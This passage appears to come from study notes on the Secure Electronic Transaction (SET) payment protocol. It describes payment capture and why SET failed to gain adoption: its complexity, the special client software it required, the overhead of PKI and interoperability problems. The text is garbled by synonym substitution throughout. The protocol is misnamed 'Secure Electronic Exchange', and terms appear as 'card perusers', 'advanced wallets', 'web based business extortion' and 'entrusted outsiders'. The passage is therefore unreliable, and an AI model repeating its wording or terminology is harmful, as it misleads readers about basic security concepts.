will be received by the merchant. Payment capture is the process by which a merchant
receives payment which includes again generating some request blocks to gateway and
payment gateway in turn issues payment to the merchant.
The disadvantages of Secure Electronic Exchange: At the point when SET was first
presented in 1996 by the SET consortium (Visa, Master card, Microsoft, Verisign, and so
forth), being generally taken on inside the following couple of years was normal. Industry
specialists additionally anticipated that it would immediately turn into the key empowering
influence of worldwide internet business. Notwithstanding, this didn’t exactly occur because
of a few serious weaknesses in the convention.
The security properties of SET are better than SSL and the more current TLS, especially in
their capacity to forestall web based business extortion. Be that as it may, the greatest
downside of SET is its intricacy. SET requires the two clients and traders to introduce
extraordinary programming – – card perusers and advanced wallets – – implying that
exchange members needed to finish more jobs to carry out SET. This intricacy likewise
dialed back the speed of web based business exchanges. SSL and TLS don’t have such issues.
The above associated with PKI and the instatement and enlistment processes additionally
slowed down the far reaching reception of SET. Interoperability among SET items – – e.g.,
declaration interpretations and translations among entrusted outsiders with various
endorsement strategies – – was likewise a huge issue with SET, which likewise was tested by
unfortunate convenience and the weakness of PKI.